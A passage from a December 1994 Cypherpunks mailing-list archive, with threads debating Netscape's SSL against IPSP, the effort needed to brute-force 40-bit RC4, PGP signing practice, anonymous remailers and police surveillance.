giving off these days. > Kipp: > You are right. It doesn't work with existing proxy's. But existing proxy's > can't do secure data transfers, so what's your point? Rather than saying, "oh, our new 'standard' won't work with existing technology, so buy ours", you might say, "we will be happy to work with the developers of existing proxies to make necessary changes to be compatible with our product. Alternatively, you could buy our proxy software which also has some additional benefits of foo, bar and baz." (Also, not every solution to every Web security threat involves breaking existing proxies.) But no, you blindly forge ahead, so full of yourself that you blissfully reinvent wheels (Perry), miss the real concerns of the users (Me), disrupt the marketplace (Amanda), and generally fail to think things through very well (Adam) or consider the work of others (Perry). Your three biggest problems are: arrogance, arrogance and arrogance. Kipp: > In any case, my personal opinion is that NCOM is being attacked with a > catch-22. If we had kept the protocol proprietary, then we would have been > shot. We went public with it and are getting shot. If we had waited the 2.5 > years to develop it, as a few here would seem to be advocating, then the market > would shoot us. > If you were willing to _read_ and to go to an occasional meeting, or even send out a post, "Hey, I'm about to sink the resources of this company into coming up with yet another transport layer security protocol, anyone got one already?", then you might get less hostility, or you might not get used for target practice so often. From ianf at sydney.sgi.com Mon Dec 12 17:16:20 1994 From: ianf at sydney.sgi.com (Ian Farquhar) Date: Mon, 12 Dec 94 17:16:20 PST Subject: Time to exhaustively break 40-bit RC4? In-Reply-To: <9412130031.AA11399@snark.imsi.com> Message-ID: <9412131211.ZM13506@wiley.sydney.sgi.com> On Dec 12, 7:31pm, Perry E. Metzger wrote: > ...its a question of deriding the security of any system that takes so > little time to crack, and thats assuming there are no better attacks > than brute force (yet to be determined). With optimization, you can do > even better than that. With a little bit of hardware (not very much) > you can crack open a 40 bit keyspace with the effort normally reserved > for opening your bathroom door in the morning. Actually, it's a bit more than a "little bit of hardware". One of the interesting realisations of pondering VLSI crackers was how much chip real-estate storing 2048 bits of laregly static internal state required, disregarding the size of a 2048 bit bus (remember "transistors are cheap, wires are expensive".) All transfers would have to be multi-cycle operations, which adds complexity due to the need to time and synchronise these transfers. It's by no means impossible, but the design of such a device is certainly not a trivial exercise in engineering, and I would never call the result a "little piece of hardware". Ian. From g4frodo at cdf.toronto.edu Mon Dec 12 17:18:45 1994 From: g4frodo at cdf.toronto.edu (Richard Martin ( frodo )) Date: Mon, 12 Dec 94 17:18:45 PST Subject: Hal Finney & Bob Rae and Ontario's Parliament In-Reply-To: <199412120739.CAA03309@bb.hks.net> Message-ID: <94Dec12.201828edt.1041@marvin.cdf.toronto.edu> -----BEGIN PGP SIGNED MESSAGE----- In message <199412120739.CAA03309 at bb.hks.net>, "L. McCarthy" writes: >Is this true ? Probably not. In my reply to a query about it, I recommended the use of Viacrypt, mainly because of legal concerns, and partly because of the prospects of printed documentation (I like manuals I can burn when I'm done with them), user support, and so on. (Bluntly, I'm currently having to drop all the way out to DOS to sign things right now, and I don't think the Premier's office would be too wild about such a prospect. They're probably all Windows people, so they'll run the Windows version, if they use it at all. Bob Rae is the premier of Ontario, not the prime minister (though in French, he would be "le premier ministre" of Ontario). Oh. What is cypherpunks thought on having two Rae keys? Many business people have photocopied signatures (or digitized) for relatively unimportant mailings... Can a key be shared among the premier and his confidential secretary, say, with another for legal matters and a third for private communications? >According to the PGP 2.6.1 User's Guide: >"The freeware version of PGP is only for personal, non-commercial use -- all >other users in the USA and Canada must obtain a fully licensed version of PGP >from ViaCrypt. [...] If you have a need to use PGP in a commercial or >Government setting, and ViaCrypt has a version of PGP for your hardware >platform, you should get ViaCrypt PGP." Mea culpa. I was thrown by the US government's free use of it (I think they get that, don't they?). On a silly note, my government is not currently making money, and could hardly be classified as being in business. ;) frodo - -- Richard Martin ChemPhysCompSci 9T7+PEY = 9T8 g4frodo at cdf.toronto.edu Trinity College University of Toronto SVW92 martinrd at gpu.utcc.toronto.edu My opinions, when not poached. (or fried) frodo at uhura.trinity.toronto.edu -----BEGIN PGP SIGNATURE----- Version: 2.6.i iQCVAgUBLuz8Uq+lG3+zwTCVAQHm3wP/dKBORWta6tSxTzqFuNYbOm/ohh/d9RBe uZ/Z1IcSOQmX2oeKvkShnca4rbNF10kPEfCgz2gMnRKwWNLtgUZ1Edvmta90CcQ2 7Iim86+xD0RwE+1M67qosUI0uNoL/50JLdoqX19zDDdZ45ddd+QTrDSAv1hm2yos OTtytJllSBc= =Mciz -----END PGP SIGNATURE----- From anonymous-remailer at xs4all.nl Mon Dec 12 17:19:58 1994 From: anonymous-remailer at xs4all.nl (Name withheld on request) Date: Mon, 12 Dec 94 17:19:58 PST Subject: Clarification of my remarks about Netscape In-Reply-To: <9412122322.AA11307@snark.imsi.com> Message-ID: <199412130121.AA28319@xs1.xs4all.nl> In article <9412121600.ZM17661 at warp.mcom.com>, Kipp E.B. Hickman wrote: >> Use DNS for key distribution. Use IPSP (soon to be standardized -- SSL >> isn't standard either) for the packet layer. Use some variant of >> Photuris for key distribution. All the software in question is >> publically available or will be and will run on a wide variety of >> platforms. > >Please provide a reference for "Photuris". The web crawler couldn't find it. While you're at it please do my job for me too Perry. From warlord at MIT.EDU Mon Dec 12 17:27:46 1994 From: warlord at MIT.EDU (Derek Atkins) Date: Mon, 12 Dec 94 17:27:46 PST Subject: extra dashes in PGP-related blocks? In-Reply-To: <9412130059.AA07996@nottingham.riskdev.ml.com> Message-ID: <9412130127.AA17596@hodge-podge.MIT.EDU> -----BEGIN PGP SIGNED MESSAGE----- To: andrew at riskdev.ml.com (Andrew Brown) cc: jrochkin at cs.oberlin.edu (Jonathan Rochkind), cypherpunks at toad.com Subject: Re: extra dashes in PGP-related blocks? > but wait! you can't actually verify the outer sig until you extract > the key from inside the signed message? that's a bit more > complicated. pgp will actually recognize a key embedded inside an > armored, signed message but it won't (i don't think -- warlord?) play > with the key other than tell you it is one. Actually, PGP wont even do that. If the key is not in your keyring, it will complain about not finding it and output the de-armored message. If you want to add the key, you need to run it through PGP once to de-armor it, save off the output, and then add that output message to your keyring. > what these people should probably be doing is signing their public > keys with their private keys to provide the same functionality > (almost). what you have, otherwise, really is a two step process. > you will have to strip off the outer sig layer to get the the key. This is exactly what people should do. People should _never_ clearsign a public key block. If you want to sign it, sign the key inside the keyblock. When someone clearsigns a keyblock, they are making two passes over it to create it, which requires you to make two passes to read it in! - -derek -----BEGIN PGP SIGNATURE----- Version: 2.6.2 iQBuAwUBLuz4Lzh0K1zBsGrxAQGSTgLDBtb7BWTSXbk5s8taH+2V8/MHpz/1BYIi AesXunQmFmJ+WXGNHbkfDK5CF2VzwiYyBaDxTkY90PwEV7cUAoNg3yCI8QJbsGX/ ZkO1kxTih46a1LucIe6U4EE= =Ov0C -----END PGP SIGNATURE----- From cactus at seabsd.hks.net Mon Dec 12 17:31:03 1994 From: cactus at seabsd.hks.net (L. Todd Masco) Date: Mon, 12 Dec 94 17:31:03 PST Subject: alt.anonymous.messages propagation Message-ID: <199412130135.UAA25636@bb.hks.net> -----BEGIN PGP SIGNED MESSAGE----- (Replied to this once privately, but since mail continues to come in I'll repeat here) In article <9412122127.AA17019 at hodge-podge.MIT.EDU>, Derek Atkins wrote: >> Nope, no alt.anonymous. 'Leastaways, not off the servers that the turist >> accounts use. And since I configured news on the machine, I'd love to >> hear if there are MIT servers that have a larger set than life.ai's. > >I just looked on news.mit.edu and bloom-beacon.mit.edu (the MIT >news-transport machine), and I found both alt.anonymous and >alt.anonymous.messages, so I don't think saying "MIT doesn't get >alt.anonymous" is at all correct. > >It may be correct to say that "GNU.AI.MIT.EDU doesn't get >alt.anonymous", but GNU is _NOT_ MIT! Yup, that's why I qualified my statement. Can't check on servers I don't know about, after all. FTR, it's not GNU that I'm on/help maintain. It's bronze. So, life.ai.mit.edu is a deficient newsserver and I'll switch the default on bronze to news.mit.edu after appropriate consultations. - -- Todd Masco | It's difficult to be loud about keeping your enumerated cactus at hks.net | rights when you're busy exercising your unenumerated ones. cactus at bb.com | http://www.hks.net/~cactus/cactus.html - --- [This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.] -----BEGIN PGP SIGNATURE----- Version: 2.6.2 Comment: Gratis auto-signing service iQBFAwUBLuz6VCoZzwIn1bdtAQG1/wF7BAGUuLjGM1JVjpYxP1e6eUYNRSUPrvbX /alvpNH0g8mVFKaSPf8EH1nEeiV4K4Pf =MsKC -----END PGP SIGNATURE----- From kipp at warp.mcom.com Mon Dec 12 17:39:30 1994 From: kipp at warp.mcom.com (Kipp E.B. Hickman) Date: Mon, 12 Dec 94 17:39:30 PST Subject: Clarification of my remarks about Netscape In-Reply-To: <9412130108.AA12391@tadpole.tadpole.com> Message-ID: <9412121737.ZM17867@warp.mcom.com> On Dec 12, 6:26pm, Doug Barnes wrote: > Subject: Re: Clarification of my remarks about Netscape > > Doug B.: > > > > > > Ah, it doesn't work with existing proxies, so we have to pay > > > you. Whether it is your true motivation true or not, this > > > apparent attempt to create a market for proprietary goods by > > > disrupting standards is at the core of the bad odor that your > > > company is giving off these days. > > > > Kipp: > > You are right. It doesn't work with existing proxy's. But existing proxy's > > can't do secure data transfers, so what's your point? > > Rather than saying, "oh, our new 'standard' won't work with > existing technology, so buy ours", you might say, "we will be > happy to work with the developers of existing proxies to make > necessary changes to be compatible with our product. Alternatively, > you could buy our proxy software which also has some additional > benefits of foo, bar and baz." (Also, not every solution to > every Web security threat involves breaking existing proxies.) If this hadn't been made clear already, then hopefully this will: Our intention is to support any development effort attempting to implement an SSL conformant implementation. We will work with you to repair the spec as needed to eliminate any errors or ommisions, and help you test your implementation to ensure that it interoperates with ours. > But no, you blindly forge ahead, so full of yourself that you > blissfully reinvent wheels (Perry), miss the real concerns of > the users (Me), disrupt the marketplace (Amanda), and generally > fail to think things through very well (Adam) or consider the work > of others (Perry). > > Your three biggest problems are: arrogance, arrogance and > arrogance. I'm really sorry that this is how we are currently being perceived. It was never our intention. Rather, we wished to do those things that we believed were necessary to allow commerce on the Internet. We are a small company with limited resources and limited time to market. After talking with prospective customers we came up with a plan and implemented it. We are sorry if somebody's toes were stepped on in the process. > Kipp: > > In any case, my personal opinion is that NCOM is being attacked with a > > catch-22. If we had kept the protocol proprietary, then we would have been > > shot. We went public with it and are getting shot. If we had waited the 2.5 > > years to develop it, as a few here would seem to be advocating, then the market > > would shoot us. > > > > If you were willing to _read_ and to go to an occasional > meeting, or even send out a post, "Hey, I'm about to sink > the resources of this company into coming up with yet another > transport layer security protocol, anyone got one already?", > then you might get less hostility, or you might not get used > for target practice so often. We believe that we were up to date with respect to what was going on in the internet community at large when the company was started. Somebody should feel relieved that approach matches where the internet seems to be heading - security at the transport levels. Our imperfect examination of the work in progress yielded nothing that would meet our needs and our timelyness. I'm sorry if our selection criteria don't meet yours. In any case, the cat is out of the bag, and we are where we are. -- --------------------------------------------------------------------- Kipp E.B. Hickman Netscape Communications Corp. kipp at mcom.com http://www.mcom.com/people/kipp/index.html From tcmay at netcom.com Mon Dec 12 17:44:10 1994 From: tcmay at netcom.com (Timothy C. May) Date: Mon, 12 Dec 94 17:44:10 PST Subject: A Golden Opportunity Message-ID: <199412130143.RAA11607@netcom4.netcom.com> Cypherpunks, It seems to me that we have a golden opportunity to apply our crypto know-how, and our special perspective, to truly important issues. In recent days we have seen on our own list commments from folks from Netscape--surely a major players in whatever's coming--and from attendees at the recent IETF meeting (that stuff is Acronym City to me, so I stay out of the debate). And contributions from Phil Zimmermann, Bruce Schneier, Steven Levy, and the like. "Can't we all just get along?" is a much-laughed-at slogan, but it seems to apply here. We have a golden opportunity to influence the Net of the future, surely a good thing. (And I haven't even mentioned the Cypherpunks connections to digital cash of various flavors.) I understand that this list is no substitute for things like the recently-occurring IETF conference (or whatever it was), but it seems unproductive to be arguing here. (Argument can be good, of course. Amanda Walker _started_ the argument, but the resulting debate has been illuminating, so I think the outcome of the argument has been generally good.) I suppose what I'm suggesting is that we treat the confluence of influntial people here as a good opportunity to debate the future. We probably can't debate fine points in great detail--the list just can't support the passing of detailed specs back and forth--but I think many of us are willing to put up with some acronyms in exchange for you putting up with our non-IETF comments (:-}). The future Net is now being architected. What better time for Cypherpunks to apply their various views? --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From eric at remailer.net Mon Dec 12 17:45:34 1994 From: eric at remailer.net (Eric Hughes) Date: Mon, 12 Dec 94 17:45:34 PST Subject: Time to exhaustively break 40-bit RC4? In-Reply-To: <9412131131.ZM13269@wiley.sydney.sgi.com> Message-ID: <199412130242.SAA00825@largo.remailer.net> From: "Ian Farquhar" No, because as you're doing an exhaustive keysearch, you can "pipeline" the key generation process in software. Each key requires 256 swaps, certainly, but there are only two swaps difference between the key for "0000000000" and "0000000001" (assuming a 40 bit key). Not by my count. The key data length for a forty bit key is only 5. That means that each byte of the key data is used about fifty times in key setup (256/5). Those initial changes in the internal key permutation table then propagate under iteration. Now I haven't looked very closely at how to optimize this search, and it's not even clear that it's possible. There are 256! possible permutations for the internal key, which is a lot more than 2^40 possible (external) keys. It's quite possible that the internal keys are just not particularly close to each other. Close here, say, is the minimum number of swaps needed to take one key to another. It's possible that some arrangement other than incrementing the key yields internal key correlations that speed up software internal key generation. Eric From hfinney at shell.portal.com Mon Dec 12 17:57:11 1994 From: hfinney at shell.portal.com (Hal) Date: Mon, 12 Dec 94 17:57:11 PST Subject: Time to exhaustively break 40-bit RC4? In-Reply-To: <199412122330.PAA29185@netcom20.netcom.com> Message-ID: <199412130156.RAA11086@jobe.shell.portal.com> -----BEGIN PGP SIGNED MESSAGE----- "Ian Farquhar" writes: >No, because as you're doing an exhaustive keysearch, you can "pipeline" >the key generation process in software. Each key requires 256 swaps, >certainly, but there are only two swaps difference between the key >for "0000000000" and "0000000001" (assuming a 40 bit key). If you >recursively generate keys, then you can generate successive keys >like this: This is not true, for a few reasons. First, keys are replicated (reused over and over) until 256*8=2048 bits have been used. So a 40-bit key would get reused about 50 times. Second, the key feeds into a PRNG which is mixed in with the swapping, so once you swap with a different one you will swap differently from then on. And third (and this is the one I find most interesting), SSL does not just use a 40-bit key for the export versions. They use a 128-bit key, but they require 128-40=88 bits to be sent in the clear. So the potential keyspace is much bigger than 2^40. This will make certain attacks (primarily those involving pre-calculation, which actually doesn't apply to your pipeline I guess) impossible. I thought it was interesting that this "128 minus 88" bit key qualified for the export approval. This suggests that NSA has no better attack than brute force (nothing relying on cryptographic weaknesses of 40 bit keys, for example). Hal -----BEGIN PGP SIGNATURE----- Version: 2.6 iQBVAwUBLuz/VBnMLJtOy9MBAQFMQwIAgo6XwroajnfYmRzSasstBSTKFGVeGI5U Kbg4VBG9FU9qFJaZ6hDpFbfZhvSc8OPnK0COWuZsdEZDcl1QDuwELA== =JCls -----END PGP SIGNATURE----- From raph at netcom.com Mon Dec 12 17:57:45 1994 From: raph at netcom.com (Raph Levien) Date: Mon, 12 Dec 94 17:57:45 PST Subject: Time to exhaustively break 40-bit RC4? In-Reply-To: <9412131131.ZM13269@wiley.sydney.sgi.com> Message-ID: <199412130151.RAA26048@netcom20.netcom.com> Ian Farquhar wrote: > No, because as you're doing an exhaustive keysearch, you can "pipeline" > the key generation process in software. Each key requires 256 swaps, > certainly, but there are only two swaps difference between the key > for "0000000000" and "0000000001" (assuming a 40 bit key). If you > recursively generate keys, then you can generate successive keys > like this: This doesn't quite work. As I understand it, the RC4 key scheduling algorithm repeats the key to fill 256 bytes. For a 128-bit key, this is 16 times. Thus, you can only win on the last repeat. Perry also mentioned some "optimizations" but I believe RC4 is resistant to this sort of thing. The inner loop is about as simple as you're going to get it. Oh, just to clarify one point. 40-bit RC4 in fact uses a 128 bit key, it's just that 88 bits of the key are sent in the clear. Your idea does help in searching the 128-bit keyspace. Unfortunately, it reduces the time needed from about 10^45 to 10^43 operations. Mazel Tov. Raph From Tony.Gurnick at nzdairy.co.nz Mon Dec 12 17:58:41 1994 From: Tony.Gurnick at nzdairy.co.nz (DNA) Date: Mon, 12 Dec 94 17:58:41 PST Subject: Anonymous Repository Message-ID: <94121314474992@nzdairy.co.nz> To solve anonymous replys heres a little scenario. Alice wants something from bob (crypto?) but dosent want bob to know (or any others (NSA?)) to know. 1) Alice sends a request to bob via and anon-remailer chain. 2) In the request she specifiys that bob is to put a special code in the message and send it to anon-repostiory at nowhere.com 3) Bob sends the info + the special code, for whatever reason. (Payment recieved?) 4) Alice sends a message to anon-repostiory at nowhere.com saying to copy bobs message (using special code) to a new secret special code (here code represents a file name) - This message could/should be encrypted and the repository should delete it after the copy is made. 5) At some indetermined time in the future alice ftp`s or sends a mail message to anon-repostiory at nowhere.com and retrives bobs message. This should defeat traffic analysis but will do nothing if the repository is compromised! But the same goes for anon-remailers. There are huge blanks in this, so does anyone want to comment? T From eric at remailer.net Mon Dec 12 18:04:14 1994 From: eric at remailer.net (Eric Hughes) Date: Mon, 12 Dec 94 18:04:14 PST Subject: IPSP and Netscape In-Reply-To: <9412121508.ZM17611@warp.mcom.com> Message-ID: <199412130302.TAA00871@largo.remailer.net> I've tried really hard to stay out of this, but this one is just too much. The question is about IPSP, the swIPe-like IP level security protocol. From: "Kipp E.B. Hickman" Name one router that speaks the secure protocols you are documenting? Name one PPP based bridge that does? Show me, today, what percentage of the Internet is covered by these standards? [ ... later ... ] My company's network hardware is typical. It is filled with expensive devices that don't understand IPSP or IPNG. In fact, most of the world is constructed this way. The protocol does IP-within-IP encapsulation, which means that every single router deployed is able to carry the secured traffic. Now, this is not so egregious an error by itself (it is, but I'm being polite), but coupled with the claims that SSL is better than anything else out there, I see an argument from chauvinism rather than one from knowledge. Since IPSP works at the IP level rather than at the TCP level there are protocol stacks that have to change. This is not immediate. It may be that IPSP is not the quickest or best way to link security, but that is not the point I am making here. The original denial of IPSP's potential utility was made in complete ignorance, ignorance so great to lack even the most basic understanding of the subject at hand. I cannot trust abbreviated arguments from such a source. I can, however, examine ones which are complete and well thought out and demonstrate some understanding of tradeoffs. Eric From perry at imsi.com Mon Dec 12 18:09:08 1994 From: perry at imsi.com (Perry E. Metzger) Date: Mon, 12 Dec 94 18:09:08 PST Subject: Clarification of my remarks about Netscape In-Reply-To: <9412121638.ZM17746@warp.mcom.com> Message-ID: <9412130208.AA11526@snark.imsi.com> "Kipp E.B. Hickman" says: > In any case, my personal opinion is that NCOM is being attacked with > a catch-22. If we had kept the protocol proprietary, then we would > have been shot. We went public with it and are getting shot. If we > had waited the 2.5 years to develop it, as a few here would seem to > be advocating, then the market would shoot us. This is a false dichotomy -- there are far more possibilities than that. I pillory you not for being non-public but for being non-intelligent. You could have bothered to read the literature and designed something useful given an understanding of what came before (your naive notion that somehow IPSP might require router modifications would have been dispelled had you bothered to spend the half hour needed to read and understand the proposals) or you could have gone to the IETF and gotten everything done very fast if you'd bothered to use the system right. As it stands you come off looking like ignorant blunderers. .pm From eric at remailer.net Mon Dec 12 18:11:05 1994 From: eric at remailer.net (Eric Hughes) Date: Mon, 12 Dec 94 18:11:05 PST Subject: public key algorithms and Netscape Message-ID: <199412130308.TAA00892@largo.remailer.net> The claim was made here by someone at Netscape that no suitable public key algorithms existed other than RSADSI technology. I don't remember how explicit this claim was; it may have been an implication of some more general statement. I note that the folks at Netscape must never have heard of elliptic curve algorithms for public key technology. I would hazard that representatives at RSADSI stated or implied that such technology was covered by their patents. I would then ask if they said so in writing. Making claims about a patent that are knowingly false is grounds for vacating the patent. The IEEE P1363 working group on cryptography standards is moving forward with elliptic curve cryptosystems but not with RSA because of patent issues. Coincidence? Eric From sandfort at crl.com Mon Dec 12 18:14:52 1994 From: sandfort at crl.com (Sandy Sandfort) Date: Mon, 12 Dec 94 18:14:52 PST Subject: THROUGH THE LOOKING GLASS Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, Tim May wrote: ... I don't want to see my local cops have all of their actions videotaped and reviewed for quite another reason--I don't want a "mechanization" of the enforcement process! Won't happen. First, cops are already required to enforce some stupid laws; the mechanism used is "quotas." Second, the vast number of laws makes total enforcement impossible. Third, the cops aren't pulling a fast one when they use their discretion to cut someone loose. I've even seem them do it on the TV show "COPS." That discretion is clearly within their powers. It's the "let's-whack-the-hippie" sort of discretion that is denied them. ... I have some good opinions of the California Highway Patrol ... even a cop-disliking skeptic like me can be convinced that some good is done is by them, and that not all cops are bad.... I agree; and Mussolini did make the trains run on time . . . My proposal is not anti-cop; it's anti- *bad* cop. Good cops *benefit* from protective surveillance; and *all* cops benefit from having their exact location known when the feces impacts the turbine. S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From sandfort at crl.com Mon Dec 12 18:15:08 1994 From: sandfort at crl.com (Sandy Sandfort) Date: Mon, 12 Dec 94 18:15:08 PST Subject: OFF LINE Message-ID: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SANDY SANDFORT . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C'punks, I am moving back to California. I fly out tomorrow evening. I will be off-line for a day or two at least. Go ahead and send me stuff; I'll get to it as soon as I can. S a n d y ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From eric at remailer.net Mon Dec 12 18:20:15 1994 From: eric at remailer.net (Eric Hughes) Date: Mon, 12 Dec 94 18:20:15 PST Subject: Clarification of my remarks about Netscape In-Reply-To: <9412121737.ZM17867@warp.mcom.com> Message-ID: <199412130318.TAA00912@largo.remailer.net> From: "Kipp E.B. Hickman" If this hadn't been made clear already, then hopefully this will: Our intention is to support any development effort attempting to implement an SSL conformant implementation. We will work with you to repair the spec as needed to eliminate any errors or ommisions, and help you test your implementation to ensure that it interoperates with ours. It's clear to me. "We're going to use some security, as long as it's called SSL and our authorship is on the document." Eric From eric at remailer.net Mon Dec 12 18:21:06 1994 From: eric at remailer.net (Eric Hughes) Date: Mon, 12 Dec 94 18:21:06 PST Subject: Clarification of my remarks about Netscape In-Reply-To: <199412130121.AA28319@xs1.xs4all.nl> Message-ID: <199412130319.TAA00915@largo.remailer.net> Kipp E.B. Hickman wrote: Please provide a reference for "Photuris". Ah, the hazards of not going to IETF... Eric From eric at remailer.net Mon Dec 12 18:37:39 1994 From: eric at remailer.net (Eric Hughes) Date: Mon, 12 Dec 94 18:37:39 PST Subject: [cpunks] Re: public accounts / PGP / passphrases In-Reply-To: <199412120712.CAA01736@sparcserver.mc.ab.com> Message-ID: <199412130335.TAA00953@largo.remailer.net> From: tim werner But I agree that the idea of buying a laptop so you can use PGP at work is odious. There must be a better way. But remember, the computer you normally use at work is the property of your employer, and they are Free to Deny You Privacy with it at work. It remains to be seen where the chips will fall with respect to workplace privacy generally. Perhaps workplace email is a good argument for wireless. Eric From eric at remailer.net Mon Dec 12 18:49:11 1994 From: eric at remailer.net (Eric Hughes) Date: Mon, 12 Dec 94 18:49:11 PST Subject: BofA+Netscape In-Reply-To: <199412120131.RAA14755@netcom10.netcom.com> Message-ID: <199412130347.TAA00969@largo.remailer.net> How many times will there remain the confusion between what is achievably optimal and what is permitted? From: jamesd at netcom.com (James A. Donald) Now plainly they should listen very carefully to what the guys at CERN say about SGML tags, but as far as I can see, the groups that you want them to take consensus with, have no standing in this matter. This is all very Libertarianly Correct, certainly, but it may also be downright stupid. If one WWW company manages to fragment the web, the total value available to all drops, and it may also be that individual value is also less. Communications technologies have use-value superlinear in the number of people using compatible systems, so fragmentation always reduces total value. Whether the individual fragmented value is greater or larger than an individual non-fragmented value I cannot say. I do know that free software has this tendency to be easily replaceable. Eric From pstemari at fsp.fsp.com Mon Dec 12 18:51:39 1994 From: pstemari at fsp.fsp.com (Paul Ste. Marie) Date: Mon, 12 Dec 94 18:51:39 PST Subject: real time surveillances In-Reply-To: Message-ID: <9412130250.AA16328@fsp.fsp.com> > The developers of the localizer technology I mentioned in my > article have anticipated you. Their equipment can do real-time > vital sign monitoring. There are some obvious benefits for wired > cops plus some subtle drawbacks for bad cops. (I leave discovery > of said drawbacks as an exercise for the student.) Heh. You mean, I assume, that such a device would, when worn by an officer in court, essentially become a broadcast polygraph? It would also provide an interesting check in wrongful force cases as to whether a cop really was in fear of his life at a given time. From eric at remailer.net Mon Dec 12 18:55:26 1994 From: eric at remailer.net (Eric Hughes) Date: Mon, 12 Dec 94 18:55:26 PST Subject: Broadcasts and the Rendezvous Problem In-Reply-To: <199412112248.RAA25113@bb.hks.net> Message-ID: <199412130353.TAA00981@largo.remailer.net> From: "L. Todd Masco" That's not a very good approach: a human has to add a new remailer into the "net" by adding it to the systems polled. Not only is the human intervention a Bad Thing, but having a central registry of remailers is bad infrastructure. A more "web-of-trust"-like mechanism is desirable. In terms of autopinging, certainly human intervention is not desirable. This begs one question though, namely, "how does one gain trust in a remailer?". Certainly likelihood of service can be automated, but other forms of trust cannot. Human intervention is necessary each time someone begins to trust a remailer. That intervention can be for one's own use or for someone else's, but automatically trusting new remailers is Not Good. The question then becomes "what is the structure of human intervention required to change the trust in a remailer?". Use of agency will be desirable, certainly. These questions of human relations need to be examined before technical means of communication can be profitably pinned down. Eric From marca at neon.mcom.com Mon Dec 12 19:01:50 1994 From: marca at neon.mcom.com (Marc Andreessen) Date: Mon, 12 Dec 94 19:01:50 PST Subject: BofA+Netscape Message-ID: At 7:50 AM 12/12/94, Perry E. Metzger wrote: >Marc Andreessen says: >> I fully expect we'll be supporting other security standards and >> approaches as they emerge, and we certainly welcome realistic suggestions >> on what we should do, when, and how. > >I told you in Email, Mr. Andreessen, that new transport level security >protocols are useless now that IPSP has come near to standardization >and now that prototype implementations are nearly available. Great, IPSP looks fantastic and we look forward to supporting it as it moves through and beyond the "near" phase. > Many >people at IETF in other groups expressed far less interest in >proceeding with new security protocols now that there will be a >network layer security protocol. However, you did not appear to be >remotely interested. I suppose that you considered the comment I made >"unrealistic". No, I think IPSP is a great idea and I don't thin there's any question we'll be supporting it. >unfortunately, the product is >just too pretty looking. Thanks! Cheers, Marc -- Marc Andreessen Netscape Communications Corporation Mountain View, CA marca at mcom.com From tcmay at netcom.com Mon Dec 12 19:05:55 1994 From: tcmay at netcom.com (Timothy C. May) Date: Mon, 12 Dec 94 19:05:55 PST Subject: real time surveillances In-Reply-To: <9412130250.AA16328@fsp.fsp.com> Message-ID: <199412130303.TAA03266@netcom17.netcom.com> Paul Ste. Marie wrote: > > > The developers of the localizer technology I mentioned in my > > article have anticipated you. Their equipment can do real-time > > vital sign monitoring. There are some obvious benefits for wired > > cops plus some subtle drawbacks for bad cops. (I leave discovery > > of said drawbacks as an exercise for the student.) > > Heh. You mean, I assume, that such a device would, when worn by an > officer in court, essentially become a broadcast polygraph? It would > also provide an interesting check in wrongful force cases as to > whether a cop really was in fear of his life at a given time. I can't speak for what Sandy S. meant, but I can assure you that a "broadcast polygraph" is not planned, nor is it likely to be technologically feasible any time soon. The basic technology is for position localization, not vital sign reporting, etc. To be sure, a vital signs subsystem could be linked to another system (as could a polygraph, with a lot of effort). But such is not the main intended purpose. --Tim May -- .......................................................................... Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at netcom.com | anonymous networks, digital pseudonyms, zero 408-688-5409 | knowledge, reputations, information markets, W.A.S.T.E.: Aptos, CA | black markets, collapse of governments. Higher Power: 2^859433 | Public Key: PGP and MailSafe available. Cypherpunks list: majordomo at toad.com with body message of only: subscribe cypherpunks. FAQ available at ftp.netcom.com in pub/tc/tcmay From pstemari at fsp.fsp.com Mon Dec 12 19:19:02 1994 From: pstemari at fsp.fsp.com (Paul Ste. Marie) Date: Mon, 12 Dec 94 19:19:02 PST Subject: real time surveillances In-Reply-To: <199412130303.TAA03266@netcom17.netcom.com> Message-ID: <9412130315.AA16603@fsp.fsp.com> > I can't speak for what Sandy S. meant, but I can assure you that a > "broadcast polygraph" is not planned, nor is it likely to be > technologically feasible any time soon. > > The basic technology is for position localization, not vital sign > reporting, etc. To be sure, a vital signs subsystem could be linked to > another system (as could a polygraph, with a lot of effort). But such > is not the main intended purpose. My point was that essentially a (broadcast of vital signs) == (broadcast of polygraph). There's some stuff that's different, but I don't think that it's sufficient to make a real difference. What your friends are current working on implementing, of course, is not (yet) to this point. Paul From usura at replay.com Mon Dec 12 19:54:23 1994 From: usura at replay.com (Alex de Joode) Date: Mon, 12 Dec 94 19:54:23 PST Subject: uSuRa anonymous remailer [update] Message-ID: <199412130355.AA18327@xs1.xs4all.nl> I have registerd the domain-name replay.COM at InterNic. XS4all has installed some sort of MX-handling for my account, usura at xs4all.nl, so my new address wil be usura at replay.com. The remailer that is operated from that account is now also reachable at the replay.com address. The usura at xs4all.nl remains valid. Raph Levien has updated the address in his automated pinger; here is the updated PGPkey for the usura at replay.COM remailer: -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.2 Comment: Replay and Company Limited. mQCNAi4wTh8AAAEEAMb9gl6NlZHy4FdjADel4d+C+Th7+inTOV4mEsKk+N/QfJAj BN6YPnJ9bm+Ch19FrR1KeTwrpluP6J+GdJrMkVSosvIqBPpSRgOs7nvMhnn3Tnrn uUFZVDYslQ1wRZvFbTpCEW8TzgVhGy6HMznxEC4ttnOq8pFRFUpL3asf+toVAAUR tCt1U3VSYSBhbm9ueW1vdXMgcmVtYWlsZXIgPHVzdXJhQHJlcGxheS5DT00+iQCV 